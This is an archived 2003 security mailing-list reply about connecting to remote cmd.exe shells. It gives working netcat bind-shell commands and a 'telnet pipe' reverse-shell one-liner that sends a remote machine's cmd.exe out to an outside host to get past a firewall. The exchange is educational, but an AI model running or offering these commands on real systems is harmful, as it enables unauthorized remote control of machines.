Security Basics mailing list archives
Re: How does one connect to a shell (cmd.exe) bound to a port on a remote machine?
From: DownBload <downbload () hotmail com>
Date: 8 Nov 2003 10:20:41 -0000
In-Reply-To: <20031106153902.26988032.mspencer () evidentdata com>
From: "Mark G. Spencer" <mspencer () evidentdata com> I've been looking at some perl scripts that purport to create cmd.exe shells bound to a tcp port on a remote machine. I'm curious, how would someone connect to these shells? The code looks very compact, I wouldn't imagine you could just http to the port bound with cmd.exe? Perhaps telnet? Is this how Code Red and Nimda were operating?
The best tool for such things is NetCat. Just run it as 'nc.exe -l -v -p 31337 -e cmd.exe' and you will have shell on tcp port 31337. When you want to connect to that host and port, use again NetCat, but now as 'nc.exe remote_host.com 31337' and you have shell. In some cases (like with firewalled machines) you can use "telnet pipe" technique to bypass firewall. First run two instance of nc.exe on your machine, like this: nc.exe -l -v -p 31337 nc.exe -l -v -p 31338 (each in spearated window) Now on remote machine do something like "telnet your_host.com 31337 | cmd.exe | telnet your_host.com 31338" Write commands in first window on your machine, and output will be in second window. ------------------------------------ DownBload / Illegal Instruction Labs Security Research & Education http://www.ii-labs.org e-mail:downbload[at]hotmail.com , , /| |\ \\.....// "Born under the lucky star magical, |.\ /.| but on this earth generally tragical." \\^// o_o ` Check our wargame: http://www.ii-labs.org/wargame/ --------------------------------------------------------------------------- Forum Systems PRESIDIO: PGP / XML GATEWAY APPLIANCE The Presidio integrates PGP data encryption and XML Web Services security to simplify the management and deployment of PGP and reduce overall PGP costs by up to 80%. FREE WHITEPAPER & 30 Day Trial - http://www.securityfocus.com/sponsor/ForumSystems_security-basics_031027 ----------------------------------------------------------------------------
Current thread:
- Re: How does one connect to a shell (cmd.exe) bound to a port on a remote machine? DownBload (Nov 10)
- <Possible follow-ups>
- Re: How does one connect to a shell (cmd.exe) bound to a port on a remote machine? H Carvey (Nov 11)